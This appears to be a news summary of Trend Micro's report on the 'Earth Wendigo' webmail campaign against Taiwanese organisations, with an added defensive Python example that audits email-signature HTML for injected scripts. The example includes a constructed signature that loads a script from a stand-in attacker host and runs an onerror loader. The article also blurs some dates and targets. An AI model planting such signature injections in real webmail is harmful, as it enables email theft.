According to cybersecurity experts, the attacks are attributed to Earth Wendigo, a threat actor not currently linked to any known hacking group. At the start of May 2019, Trend Micro reported that multiple organizations had been attacked by Earth Wendigo. The targets include research institutions, government organizations and universities. The campaign used spear-phishing emails against its victims, who include activists and politicians based in Hong Kong, Tibet and the Uyghur region.
Trend Micro reports, "we discovered a new campaign that has been targeting several organizations — including government organizations, research institutions and universities in Taiwan — since May 2019, aiming to exfiltrate emails from targeted organizations via the injection of JavaScript backdoors to a webmail system that is widely-used in Taiwan. With no clear connection to any previous attack group, we gave this new threat actor the name 'Earth Wendigo.'"
Earth Wendigo deployed spear-phishing emails containing obfuscated JavaScript code as the initial attack vector. That JavaScript loaded malicious scripts from remote servers controlled by the attackers. The scripts were built to steal webmail session keys and browser cookies, to spread by appending the malicious code to the target's email signature, and to exploit a cross-site scripting (XSS) vulnerability in the webmail server in order to inject JavaScript. "The Earth Wendigo threat actor will establish a WebSocket connection between the victims and their WebSocket server via a JavaScript backdoor. The WebSocket server instructs the backdoor on the victim's browser to read emails from the webmail server and then send the content and attachments of the emails back to the WebSocket servers," says Trend Micro.
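One place a defender can catch the signature-based persistence described above is a server-side audit of the HTML a user saves as an email signature. The following is an added Python example, not code from the article or from Trend Micro; the `audit_signature` function, its findings format and the two sample signatures are constructed for illustration.

```python
"""Flag active content in stored webmail email signatures.

Added defensive example: the campaign persisted by appending JavaScript
to victims' email signatures, so checking saved signature HTML for
script tags, remote loaders and inline event handlers is one detection
point. The sample signatures at the bottom are constructed.
"""
from html.parser import HTMLParser


class SignatureAuditor(HTMLParser):
    """Collects findings that indicate executable content in signature HTML."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            src = attrs.get("src")
            self.findings.append(
                f"remote script loader: {src}" if src else "inline <script>")
        for name, value in attrs.items():
            lname = name.lower()
            if lname.startswith("on"):            # onload=, onerror=, ...
                self.findings.append(f"inline event handler {lname} on <{tag}>")
            elif lname in ("href", "src") and value \
                    and value.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URL in {lname} on <{tag}>")


def audit_signature(html: str) -> list[str]:
    """Return findings for one signature; an empty list means none seen."""
    auditor = SignatureAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


# Constructed samples: a benign signature and one with appended script loaders
BENIGN = '<p>A. Chen<br><a href="https://example.org">example.org</a></p>'
INJECTED = BENIGN + ('<script src="https://attacker.invalid/loader.js"></script>'
                     '<img src="x" onerror="loadRemote()">')

if __name__ == "__main__":
    for label, sig in (("benign", BENIGN), ("injected", INJECTED)):
        print(label, audit_signature(sig) or "clean")
```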
The XSS vulnerability lies in the webmail system's shortcut feature, which allows the threat actor to insert a crafted shortcut payload that replaces parts of the webmail page with malicious JavaScript. "Additional investigation shows that the threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong. However, this is a separate series of attacks from their operation in Taiwan, which this report covers," reports Trend Micro.